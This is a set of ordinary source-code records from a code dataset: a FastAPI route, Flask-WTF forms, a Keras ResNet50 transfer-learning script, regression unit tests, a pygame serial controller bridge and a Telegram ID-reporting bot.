Session = Depends(get_db), user_details: schemas.User = Depends(get_current_user)):\n db_files = db.query(models.CloudFile).filter(models.CloudFile.user_id == user_details.id).first()\n if db_files is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n\n return db_files\n\n", "sub_path": "routers/users.py", "file_name": "users.py", "file_ext": "py", "file_size_in_byte": 1064, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 16, "usage_type": "call"}, {"api_name": "dependencies.get_current_user", "line_number": 16, "usage_type": "argument"}, {"api_name": "database.SessionLocal", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "schemas.schemas.User", "line_number": 28, "usage_type": "attribute"}, {"api_name": "schemas.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 35, "usage_type": "name"}, {"api_name": "schemas.schemas.User", "line_number": 35, "usage_type": "attribute"}, {"api_name": "schemas.schemas", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 35, "usage_type": "call"}, {"api_name": "dependencies.get_current_user", "line_number": 35, "usage_type": "argument"}, {"api_name": "fastapi.HTTPException", "line_number": 38, "usage_type": "call"}, {"api_name": "schemas.schemas.File", "line_number": 34, "usage_type": "attribute"}, 
{"api_name": "schemas.schemas", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "103561739", "text": "from flask import Flask\nfrom flask_wtf import FlaskForm,RecaptchaField#,widgets\nfrom flask_wtf.file import FileAllowed, FileRequired\nfrom wtforms import StringField,SubmitField,TextAreaField,PasswordField,DateTimeField,FileField\nfrom wtforms import SelectMultipleField,IntegerField\nfrom wtforms.validators import Required,DataRequired,Email,Length\n\nfrom werkzeug.utils import secure_filename\nfrom flask_uploads import UploadSet, IMAGES\n\n#Для чекбоксов\nfrom wtforms import widgets\n\nimages = UploadSet('images', IMAGES)\n\n#Форма отправки заказа\nclass OrderMail(FlaskForm):\n\tphone=StringField('Введите Ваш номер телефона*:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'+X(XXX)XXX XX XX'})\n\temail=StringField('Введите Ваш E-mail*:',validators=[Email()],render_kw={'Placeholder':'sample@sample.com'})\n\tdesc=TextAreaField('Краткое описание заказа*',validators=[DataRequired()])\n\tsubmit=SubmitField('Заказать')\n\n#Форма отправки смс\nclass SmsMail(FlaskForm):\n\tphone=StringField('Введите Ваш номер телефона*:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'+X(XXX)XXX XX XX'})\n\tsubmit=SubmitField('Отправить')\n\n#Форма входа\nclass LoginForm(FlaskForm):\n\tlogin=StringField('Логин:',validators=[DataRequired()],render_kw={'Placeholder':'Введите Ваш Логин'})\n\tpassword=PasswordField('Пароль:',validators=[DataRequired()],render_kw={'Placeholder':'Введите Ваш Пароль'})\n\t#recaptcha = RecaptchaField()\n\tsubmit=SubmitField('Войти')\n\n#Форма для редактирования общей информации\nclass AboutForm(FlaskForm):\n\tdtime=date=DateTimeField('Дата текста:', format='%Y-%m-%d %H:%M:%S', validators=[])#DataRequired(),Required()\n\ttext=TextAreaField('Обо мне',validators=[DataRequired()])\n\tsubmit=SubmitField('Сохранить')\n\n#Форма для загрузки файла портфолио\nclass UplFileP(FlaskForm):\n\tfname=FileField('Выберите файл:',validators=[FileAllowed(images, 'Images only!')])\n\tfdesc=StringField('Описание:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'Введите описание файла портфолио'})\n\tsubmit=SubmitField('Загрузить')\n\n#Checkboxes\nclass MultiCheckboxField(SelectMultipleField):\n\twidget=widgets.ListWidget(prefix_label=False)\n\toption_widget=widgets.CheckboxInput()\n\n#Форма для добавления контакта\nclass AddContact(FlaskForm):\n\tcontact=StringField('Введите новый контакт:',validators=[DataRequired(),Required('Введите контакт')])\n\tchoices=[]\n\ticons=MultiCheckboxField('Вид контакта:',choices=choices,coerce=int)\n\tsubmit=SubmitField('Добавить')\n\n#Форма редактирования контакта\nclass EditContact(FlaskForm):\n\tecontact=StringField('Kонтакт:')\n\teid=IntegerField('id',validators=[DataRequired()])\n\techoices=[]\n\teicons=MultiCheckboxField('Вид контакта:',choices=echoices,coerce=int)\n\tesubmit=SubmitField('Сохранить')\n\n#форма добавление иконки\nclass AddIcon(FlaskForm):\n\ticon=FileField('Выберите файл:',validators=[FileAllowed(images, 'Images only!')])\n\tidesc=StringField('Описание:',validators=[DataRequired()], render_kw={'Placeholder':'Введите описание иконки'})\n\tsubmit=SubmitField('Добавить')\n", "sub_path": "forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_uploads.UploadSet", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_uploads.IMAGES", "line_number": 14, 
"usage_type": "argument"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 18, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 18, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.validators.Email", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.TextAreaField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 25, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 26, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 26, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 31, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.TextAreaField", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 44, "usage_type": "name"}, {"api_name": "wtforms.FileField", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 45, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 46, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 46, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 48, "usage_type": "call"}, {"api_name": "wtforms.SelectMultipleField", "line_number": 51, "usage_type": "name"}, {"api_name": "wtforms.widgets.ListWidget", "line_number": 52, "usage_type": "call"}, {"api_name": "wtforms.widgets", "line_number": 52, "usage_type": "name"}, {"api_name": "wtforms.widgets.CheckboxInput", "line_number": 53, "usage_type": "call"}, {"api_name": "wtforms.widgets", "line_number": 53, "usage_type": "name"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 56, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.validators.Required", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 60, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 63, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 64, "usage_type": "call"}, {"api_name": "wtforms.IntegerField", "line_number": 65, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 65, "usage_type": "call"}, {"api_name": 
"wtforms.SubmitField", "line_number": 68, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 71, "usage_type": "name"}, {"api_name": "wtforms.FileField", "line_number": 72, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 72, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 73, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 73, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "229456352", "text": "#!/usr/bin/python\r\n# ==============================================================================\r\n# This demonstrate how to use transfer learning using a ResNet50 network.\r\n# Original data from https://arxiv.org/abs/1709.00029\r\n# Etienne Lord - 2019\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\nfrom keras.applications.resnet50 import ResNet50\r\nfrom keras.preprocessing import image\r\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D, LeakyReLU\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense,GlobalAveragePooling2D\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.callbacks import *\r\nfrom keras.models import Model\r\nfrom keras import backend as K\r\nfrom pathlib import Path\r\nimport os\r\n\r\n###############################################################################\r\n# HELPER FUNCTIONS\r\n###############################################################################\r\ndef number_of_files(dirname):\r\n\tcpt = sum([len(files) for r, d, files in os.walk(dirname)])\r\n\treturn cpt\r\n\r\n################################################################################ \r\n# DATASETS DEFINITION #\r\n################################################################################\r\ntrain_data_dir = 'EuroSatRGB_training'\r\nvalidation_data_dir = 'EuroSatRGB_validation'\r\ntest_data_dir = 'EuroSatRGB_test'\r\nnb_train_samples=number_of_files(train_data_dir)\r\nnb_validation_samples=number_of_files(validation_data_dir)\r\nnb_test_samples=number_of_files(test_data_dir)\r\n# Training image dimensions\r\nimg_width, img_height = 64, 64\r\n\r\nepochs_pre = 10 # Pre-training epoch \r\nepochs_last = 20 # Complete model epoch\r\nbatch_size = 64 # Batch size (adjust according to your avail. 
memory)\r\n\r\n################################################################################ \r\n# MODEL DEFINITION #\r\n################################################################################\r\nbase_model = ResNet50(weights='imagenet', include_top=False) #Load the ResNet model\r\n\r\nx = base_model.output\r\nx = GlobalAveragePooling2D()(x)\r\n# Add a fully connected layer\r\nx = Dense(1024, activation='relu')(x)\r\nx = Dropout(0.25)(x)\r\n# and a logistic layer with 10 classes (in our dataset)\r\npredictions = Dense(10, activation='softmax')(x)\r\n\r\n# first: train only the top layers (which were randomly initialized)\r\nfor layer in base_model.layers:\r\n layer.trainable = False\r\n\r\n# Model definitions\r\nmodel = Model(inputs=base_model.input, outputs=predictions)\r\nmodel.summary()\r\n\r\n# Compile the model (should be done *after* setting layers to non-trainable)\r\nmodel.compile(optimizer=RMSprop(lr=0.001), loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n################################################################################ \r\n# IMAGES LOADING #\r\n################################################################################\r\n\r\ntrain_datagen = ImageDataGenerator()\r\ntest_datagen = ImageDataGenerator() \r\n\r\n# Note, we could use data augmentation, \r\ntrain_generator = train_datagen.flow_from_directory(\r\n train_data_dir,\r\n target_size=(img_width, img_height),\r\n batch_size=batch_size,\r\n\tshuffle = True,\r\n class_mode='categorical') # Note: the class_mode is categorical\r\n\r\nvalidation_generator = test_datagen.flow_from_directory(\r\n validation_data_dir,\r\n target_size=(img_width, img_height),\r\n\tshuffle = True,\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n test_data_dir,\r\n target_size=(img_width, img_height),\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=5, min_lr=0.001)\r\n\r\ntensor=TensorBoard(log_dir='.',histogram_freq=1,embeddings_freq=1,)\r\ncsv_logger = CSVLogger('resnet50_rgb_pre_log.csv', append=True, separator=';')\r\n\r\n################################################################################ \r\n# RUN MODEL (Part 1) #\r\n################################################################################\r\n\r\n# Start the pretraining \r\noriginal_hist=model.fit_generator(\r\n train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs_pre,\r\n verbose=1,\r\n callbacks=[csv_logger],\r\n validation_data=validation_generator,\r\n validation_steps= (nb_validation_samples // batch_size))\r\n\r\nmodel.save('resnet50_rgb_first.hdf5')\r\n# At this point, the top layers are well trained and we can start fine-tuning\r\n# convolutional layers. 
We will freeze the bottom N layers\r\n# and train the remaining top layers.\r\n\r\n################################################################################ \r\n# RUN MODEL (Part 2) #\r\n################################################################################\r\n\r\nfor layer in model.layers:\r\n layer.trainable = True\r\n\r\nmodel.compile(optimizer=RMSprop(lr=0.0001), loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.summary()\r\n\r\ncsv_logger = CSVLogger('resnet50_rgb_last_log.csv', append=True, separator=';')\r\ncheckpointer = ModelCheckpoint(filepath='resnet50_rgb_weights.{epoch:02d}-{val_acc:.2f}.hdf5', verbose=1, save_best_only=True)\r\noriginal_hist2=model.fit_generator(\r\n train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs_last,\r\n verbose=1,\r\n callbacks=[csv_logger,checkpointer],\r\n validation_data=validation_generator,\r\n validation_steps= (nb_validation_samples // batch_size))\r\n\r\nmodel.save(\"resnet50_rgb_end.h5\")\r\n\r\n################################################################################ \r\n# SAVE MODEL #\r\n################################################################################\r\nmodel.save(\"resnet50_rgb_final.hdf5\")\r\n#\r\n# Note: To load model:\r\n# from keras.models import load_model \r\n# model=load_model(\"final_model.hdf5\")\r\n\r\n################################################################################ \r\n# FINAL NOTES #\r\n################################################################################\r\n#\r\n# 1. This demonstrate how to use transfer learning to train. However, we only use \r\n# a very small part of the dataset. Using the full dataset, we can achiever \r\n# > 95% accuracy. \r\n", "sub_path": "Day1/EuroSat_Classification/train_resnet_rgb.py", "file_name": "train_resnet_rgb.py", "file_ext": "py", "file_size_in_byte": 7385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.walk", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.applications.resnet50.ResNet50", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "186429426", "text": "import sys\nsys.path.append('../../')\n\nimport data\nimport regression\n\nimport numpy as np\nimport unittest\n\nclass TestObjectives(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.easy_fname = '../testdata/test_easyleastsquareslinear.csv'\n\t\tself.nonnumeric_fname = '../testdata/test_nonnumeric.csv'\n\t\tself.standard_fname = '../testdata/test_leastsquares.csv'\n\n\tdef testLeastSquares_nonNumeric(self):\n\t\ttestdataset = data.DataSet(self.nonnumeric_fname)\n\t\ttestregression = 
regression.LinearRegression(testdataset)\n\n\t\tself.assertRaises(ValueError, testregression.least_squares, 'text1', 'text2')\n\n\tdef testLeastSquares_easy(self):\n\t\ttestdataset = data.DataSet(self.easy_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tself.assertEqual(int(testregression.b1), 1)\n\t\tself.assertEqual(int(testregression.b0), 0)\n\n\tdef testLeastSquares(self):\n\t\ttestdataset = data.DataSet(self.standard_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tself.assertTrue(abs(testregression.b1 - 1.7) < 0.0001)\n\t\tself.assertTrue(abs(testregression.b0 - 1.9) < 0.0001)\n\n\tdef testPrediction_easy(self):\n\t\ttestdataset = data.DataSet(self.easy_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tprediction = testregression.predict(1)\n\t\tself.assertEqual(int(prediction), 1)\n\n\tdef testPrediction(self):\n\t\ttestdataset = data.DataSet(self.standard_fname)\n\t\ttestregression = regression.LinearRegression(testdataset)\n\n\t\ttestregression.least_squares('predictor', 'label')\n\t\tprediction = testregression.predict(0)\n\t\tself.assertTrue(abs(prediction - 1.9) < 0.0001)\n\nif __name__ == '__main__':\n\tunittest.main()", "sub_path": "tests/testcases/test_regression.py", "file_name": "test_regression.py", "file_ext": "py", "file_size_in_byte": 1780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "data.DataSet", "line_number": 18, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 19, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 24, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 25, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 32, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 33, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 40, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 41, "usage_type": "call"}, {"api_name": "data.DataSet", "line_number": 48, "usage_type": "call"}, {"api_name": "regression.LinearRegression", "line_number": 49, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "26988960", "text": "import sys\nimport time\n\nimport pygame\nfrom serial.tools import list_ports\n\nfrom switchlib import InputManager\nfrom seriallib import SerialManager, Payload\n\nBAUD = 38400\n\nUPDATES_PER_SECOND = 60\n\npayload = Payload()\n\ndef getPortFromUser():\n\tportList = list(list_ports.grep(\"\"))\n\tif len(portList) == 0:\n\t\traise LookupError(\"Unable to detect Serial Device.\")\n\tindexPortListString = [f\"Index: {index}, Port: {port.device}, Description: {port.description}\"\n\t\t\t\t\t\t for index, port in enumerate(portList)]\n\tprint(indexPortListString)\n\twhile True:\n\t\tind = input(\"What port index should be used? 
\")\n\t\tif not str.isdigit(ind):\n\t\t\tprint(f\"Value given is not a digit\")\n\t\telif not (0 <= int(ind) < len(portList)):\n\t\t\tprint(\"Value given is not an index in the list\")\n\t\telse:\n\t\t\treturn portList[int(ind)].device\n\n\n\n\nwinDim = (640, 480)\nlockMouse = False\nmouseSens = (2, 2)\nmouseDelta = (0, 0)\n\ninMan = InputManager(\"controllerMapping.csv\")\n\npygame.init()\n\nscreen = pygame.display.set_mode(winDim)\n\nmyFont = pygame.font.SysFont(\"Arial\", 16, bold=True)\n\ntextColor = pygame.Color(255, 255, 255)\nscreenFillColor = pygame.Color(0, 0, 0)\n\nkeysDown = []\n\nwith SerialManager(getPortFromUser(), BAUD) as serialMan:\n\twhile True:\n\t\tpayload.resetAllInputs()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tserialMan.flush()\n\t\t\t\tsys.exit()\n\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tserialMan.flush()\n\t\t\t\t\tsys.exit()\n\t\t\t\telif event.key == pygame.K_TAB:\n\t\t\t\t\tlockMouse = not lockMouse\n\t\t\t\telif not event.key in keysDown:\n\t\t\t\t\tkeysDown.append(event.key)\n\n\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\tif event.key in keysDown:\n\t\t\t\t\tkeysDown.remove(event.key)\n\t\t\t\n\t\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\t\tmouseDelta = event.rel\n\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tkeyStr = f\"m{event.button}\"\n\t\t\t\tif not keyStr in keysDown:\n\t\t\t\t\tkeysDown.append(keyStr)\n\n\t\t\telif event.type == pygame.MOUSEBUTTONUP:\n\t\t\t\tkeyStr = f\"m{event.button}\"\n\t\t\t\tif keyStr in keysDown:\n\t\t\t\t\tkeysDown.remove(keyStr)\n\n\t\tinMan.processInputs(payload, keysDown,\n\t\t\t\t(mouseDelta[0] * mouseSens[0], -mouseDelta[1] * mouseSens[1]))\n\n\t\tif lockMouse and pygame.mouse.get_focused():\n\t\t\t\tpygame.mouse.set_pos(winDim[0] / 2, winDim[1] / 2)\n\t\t\t\tpygame.event.get(pygame.MOUSEMOTION)\n\t\tmouseDelta = (0, 0)\n\n\t\tscreen.fill(screenFillColor)\n\n\t\tscreen.blit(myFont.render(f\"Sending:{str(payload)}\", True, textColor), (0,0))\n\t\tscreen.blit(myFont.render(f\"Receiving:{serialMan.readPortAsIntArr()}\", True, textColor), (0,20))\n\n\t\tpygame.display.flip()\n\t\tserialMan.write(payload.asByteArray())\n\t\ttime.sleep(1/UPDATES_PER_SECOND)\n", "sub_path": "Python/example.py", "file_name": "example.py", "file_ext": "py", "file_size_in_byte": 2657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seriallib.Payload", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.grep", "line_number": 17, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 17, "usage_type": "name"}, {"api_name": "switchlib.InputManager", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 49, "usage_type": "call"}, {"api_name": "seriallib.SerialManager", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 56, "usage_type": "call"}, 
{"api_name": "pygame.event", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.K_TAB", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_focused", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_pos", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 102, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 102, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "39537078", "text": "#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport cherrypy\nimport telebot\nfrom telebot import types\n\n\nAPI_TOKEN = 'Telegram_bot_api_token'\n\n# Not using certificate, because this bot is behind other CherryPy server or nginx\nWEBHOOK_PORT = 1234 \nWEBHOOK_LISTEN = '0.0.0.0'\n\nbot = telebot.TeleBot(API_TOKEN)\n\n\n# WebhookServer, process webhook calls\nclass WebhookServer(object):\n @cherrypy.expose\n def index(self):\n if 'content-length' in cherrypy.request.headers and \\\n 'content-type' in cherrypy.request.headers and \\\n cherrypy.request.headers['content-type'] == 'application/json':\n length = int(cherrypy.request.headers['content-length'])\n json_string = cherrypy.request.body.read(length)\n json_string = json_string.decode(\"utf-8\")\n update = telebot.types.Update.de_json(json_string)\n if update.message:\n bot.process_new_messages([update.message])\n if update.inline_query:\n bot.process_new_inline_query([update.inline_query])\n return ''\n else:\n raise cherrypy.HTTPError(403)\n \n \n@bot.message_handler(commands=[\"start\"])\ndef cmd_start(message):\n if message.chat.type == 'private':\n bot.send_message(message.chat.id, 'Your personal ID is *{0!s}*\\nNever tell it to whom you don\\'t trust!\\nYou can also add me to any group to know its ID or send me any type of media to get its `file_id`\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n elif message.chat.type == \"group\" or message.chat.type == \"supergroup\":\n bot.reply_to(message, 'This group\\'s ID is *{0!s}*\\nTo view your personal ID, please, open a separate chat with me.\\n\\nBy the way, I\\'m open source! 
Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n\n \n@bot.message_handler(content_types = ['text'])\ndef parse_text(message):\n # Send chat_id if private chat\n if message.chat.type == 'private':\n bot.send_message(message.chat.id, 'Your personal ID is *{0!s}*\\nNever tell it to whom you don\\'t trust!\\nYou can also add me to any group to know its ID or send me any type of media to get its `file_id`\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n # Send both chat_id and user's own id if group chat\n elif message.chat.type == \"group\" or message.chat.type == \"supergroup\":\n bot.reply_to(message, 'This group\\'s ID is *{0!s}*\\nTo view your personal ID, please, open a separate chat with me.\\n\\nBy the way, I\\'m open source! Check [my bitbucket page](https://bitbucket.org/mastergroosha/telegram-myid-bot/src) for details.'.format(message.chat.id), parse_mode='Markdown') \n \n \n@bot.message_handler(content_types = ['sticker'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This sticker ID is:\\n{0!s}'.format(message.sticker.file_id))\n \n\n@bot.message_handler(content_types = ['photo'])\n# Send file_id of largest copy of incoming photo\ndef send_sticker_id(message):\n bot.reply_to(message, 'This photo ID is:\\n{0!s}'.format(message.photo[-1].file_id))\n \n\n@bot.message_handler(content_types = ['audio'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This audio ID is:\\n{0!s}'.format(message.audio.file_id))\n \n \n@bot.message_handler(content_types = ['video'])\ndef send_sticker_id(message):\n bot.reply_to(message, 'This video ID is:\\n{0!s}'.format(message.video.file_id))\n \n \n@bot.message_handler(content_types = ['document'])\ndef send_document_id(message):\n bot.reply_to(message, 'This document ID is:\\n{0!s}'.format(message.document.file_id))\n \n \n@bot.message_handler(content_types = ['voice'])\ndef send_voice_id(message):\n bot.reply_to(message, 'This voice ID is:\\n{0!s}'.format(message.voice.file_id))\n \n \n@bot.inline_handler(lambda query: True)\ndef query_zero(query):\n try:\n result = types.InlineQueryResultArticle(\n id='1',\n title=\"Your ID is {!s}\".format(query.from_user.id),\n description=\"Click to send your ID to current chat.\",\n input_message_content=types.InputTextMessageContent(\n message_text=\"My personal ID is *{!s}*\".format(query.from_user.id),\n parse_mode=\"Markdown\"\n ),\n thumb_url=\"https://pp.vk.me/c629419/v629419512/2b8a4/ePHZEaeRGbU.jpg\",\n thumb_width=64,\n thumb_height=64\n )\n # Cache for everyone personally for 10 days\n bot.answer_inline_query(query.id, [result], cache_time=864000, is_personal=True)\n except Exception as e:\n print(e)\n \n \nif __name__ == '__main__':\n # Start cherrypy server\n cherrypy.config.update({\n 'server.socket_host': WEBHOOK_LISTEN,\n 'server.socket_port': WEBHOOK_PORT\n })\n\n cherrypy.quickstart(WebhookServer(), '/', {'/': {}})", 